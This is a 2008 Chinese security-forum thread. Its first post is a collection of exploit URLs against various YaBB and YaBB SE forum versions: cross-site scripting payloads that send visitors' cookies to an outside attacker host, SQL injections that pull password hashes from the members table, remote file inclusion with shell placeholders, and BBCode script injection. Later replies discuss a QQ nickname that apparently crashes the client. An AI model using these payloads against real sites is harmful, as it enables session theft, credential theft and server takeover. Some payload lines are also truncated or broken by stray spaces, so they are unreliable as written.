【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [讨论]YaBB Hack [打印本页]

作者: wlfjck 时间: 2008-7-22 09:47 标题: [讨论]YaBB Hack

[讨论]YaBB Hack
YaBB 1 Gold
Quote:http://strona.com/cgi-bin/YaBB/Y ... on=display&num=<script>al ert()</script>

Quote:http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>

YaBB 1.2
Quote:http://strona.com/yapBB/include/global.php?GLOBAL[includeBit]=1&cfgIncludeDirectory=[shell]

YaBB 1.3.2
Quote:http://[cel]/YaBB.pl?board=;action=modifycat;id=[cateogoryname];moda=Remove2
混世魔王 YABBHACK收集
YaBB 1.4.0-1.4.1
Quote:http://example.com/forums/index.php?
board=;action=login2&user=USERNAME&cookielength=12 0&passwrd=PASSWORD<script>
window.location.href(%22http://www.attackerstrona.exampl ... 2%2Bdocument.cookie)</script>

Quote:http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display;
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d'
%2b(document.cookie)%3b</Script>

Quote:http://www.myserver.com/yabbse/Reminder.php?
searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername]

YaBB SE 1.5.1
Quote:[glow=red);background:url(javascript:alert(document .cookie));filter:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(docume nt.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]

YaBB SE 1.5.5c
Quote:http://[host]/index.php?board=&action=viewprofile&user=[sql]

YaBB SE 1.5.4, 1.5.5
Quote:http://localhost:8080/yabbse//inde
x.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f 2;action=post;threadid=1;title=Post+reply;
quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,n ull,null,null+FROM+yabbse_members+where+ID_ME

YaBB SE 1.5.4, 1.5.3
Quote:http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)
+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_ BOARD=t.ID_BOARD+AND+
lmr.ID_MEN+SELECT+ID_MEMBER,+
memberName,null,passwd,null,passwd,null,null,null, null,null,null+
FROM+yabbse_members+/*

Quote:http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER =1+OR+1=1)
+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_ BOARD=t.ID_BOARD+AND+lmr.ID_ME
ull,null+FROM+yabbse_members+/*

Quote:http://[target]/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEM BER=1+OR+1=2)+GROUP+BY+readBy+UNION+SELECT+ASCII(S UBSTRING(realName,1,1)+)+

YaBB 2
Quote:[U*L]http://www.[U*L=http://wj.com/style=display:none;background:url(javascript:docum ent.images[1].src="http://strona.pl/cgi-bin/s.jpg?"+document.cookie;) ]wj[/U*L][/U*L]

YaBB SE
Quote:http://strona/forum/index.php?board='

Quote:http://strona/forum/index.php?board=1;action=display;threadid='

Quote:http://strona/forumindex.php?board=1;action=icqpager;UIN=<script >alert()</script>

Quote:http://strona/forumindex.php?board=1;action=post;threadid=1;quot e=2;title=net</title><script>alert("hacked%20by")</script>

and shell :puah[1]:

Quote:http://[cel]/yabbse/Sources/Packages.php?sourcedir=[shell]

作者: 车BB 时间: 2008-7-22 09:47

占大哥宝地发个问题
今天看到一QQ ，说如果加上他就删除不掉，至少删除的时候会卡死，我试着加了一下，果真卡死了， QQ 599234321 ，加上之后在点删除，QQ就掉了。
[完成后可按 Ctrl+Enter 发布]最后看了下，貌似问题是在他的QQ呢称上面，“? ???发表帖子? ｀6钻会员?绥?????钾矑粼矒? ”貌似是行代码，但不知道怎么写上去了，在删除他的时候，提示确认窗口的删除按钮除法这个代码，然后QQ崩溃，提示重新启动。。。。
为了确认。改了下他的备注呢称，问题解决。怎么删都没了问题，至此，确实是呢称问题。

求各位大牛看下是什么原理，给俺菜菜们科普下1 不胜感激。。fuck you
帖子8 精华0 积分15 阅读权限40 在线时间12 小时注册时间2007-4-3 最后登录2008-6-19 查看详细资料引用报告回复 TOP 赚更多的钱

zerosoul

晶莹剔透§烈日灼然

作者: 非法操作 时间: 2008-7-22 09:47

引用:
原帖由 wangyan111 于 2008-6-13 06:37 发表

今天看到一QQ ，说如果加上他就删除不掉，至少删除的时候会卡死，我试着加了一下，果真卡死了， QQ 599234321 ，加上之后在点删除，QQ就掉了。
[完成后可按 Ctrl+Enter 发布]最后看了下，貌似问题是在他的QQ呢称上面，“? ???发表帖子? ...
把此人的昵称复制下来，放到winhex里面，发现有如下hex码：
0920A3E036D7EABBE1D4B1
09-Tab
20-空格
A3-|
E0-?
这个Tab只占一字节，却占很大位置，不知道他是怎么打上去的。
貌似这是把ASCII码进行巧妙的组合搞成的，挺有意思的，呵呵.

帖子30 精华0 积分58 阅读权限40 性别男在线时间29 小时注册时间2007-12-13 最后登录2008-7-10 查看个人网站
查看详细资料引用报告回复 TOP 软件项目外包

eemi

晶莹剔透§烈日灼然

作者: ming312 时间: 2008-7-22 09:47

用非官方QQ登录删除，miranda IM

帖子33 精华0 积分56 阅读权限40 在线时间136 小时注册时间2005-7-4 最后登录2008-6-18 查看详细资料引用报告回复 TOP

wangyan111

晶莹剔透§烈日灼然

作者: 纯银 时间: 2008-7-22 09:47

引用:
原帖由 zerosoul 于 2008-6-13 07:01 发表

把此人的昵称复制下来，放到winhex里面，发现有如下hex码：
0920A3E036D7EABBE1D4B1
09-Tab
20-空格
A3-|
E0-?
这个Tab只占一字节，却占很大位置，不知道他是怎么打上去的。
貌似这是把ASCII码进行巧妙的组合搞成的，挺有意思的 ...
代码是看出来了，，问题是他怎么放进QQ呢称里的，，貌似放不进去那么长的代码。
，，，，
继续关注中，哪位牛大大来给俺科普下。。。。fuck you
帖子8 精华0 积分15 阅读权限40 在线时间12 小时注册时间2007-4-3 最后登录2008-6-19 查看详细资料引用报告回复 TOP 软件项目外包

混世魔王

荣誉会员

作者: jilang 时间: 2008-7-22 09:48

用lumaQQ 看看.取保候审中........

帖子181 精华10 积分3720 阅读权限100 性别男在线时间88 小时注册时间2005-3-12 最后登录2008-6-19 查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

赵子岩
惟一

晶莹剔透§烈日灼然

作者: vincentyip 时间: 2008-7-22 09:48

我也遇到相同问题。！
将是QQ的最新漏洞么？
加QQ33618096，然后把它拉入黑名单，不一会QQ就卡死掉线。

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
昨晚跟一朋友闲聊着，给我一个QQ让我加他再把他拉入黑名单，我在傻笑，不是无聊你？

我说我昨天也拉过几个QQ进黑名单呢，说这个QQ不同，一拉就卡死掉线了...

有点好奇，加了直接拉他为黑名单还真掉线的了........我还以我朋友在玩了..看了看下

那人的QQ，如图所示：
他的昵称总就是 anxsoft版主?有留下。塃矑蔫矒?

如果从QQ资料下手的话，那就是这个昵称起到的作用。
如果他的昵称长度大大超出了QQ昵称所规定的长度...

.........................这将会是QQ的最新漏洞么？

他的原理又是怎样的呢..............？
附件

884f7846fc7d65186b63e59d.jpg (5.63 KB)
2008-6-28 15:37

bc46a762d4003ecce7113aa8.jpg (113.58 KB)
2008-6-28 15:37

帖子110 精华2 积分291 阅读权限40 在线时间62 小时注册时间2006-10-22 最后登录2008-7-18 查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

slyar

晶莹剔透§烈日灼然

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)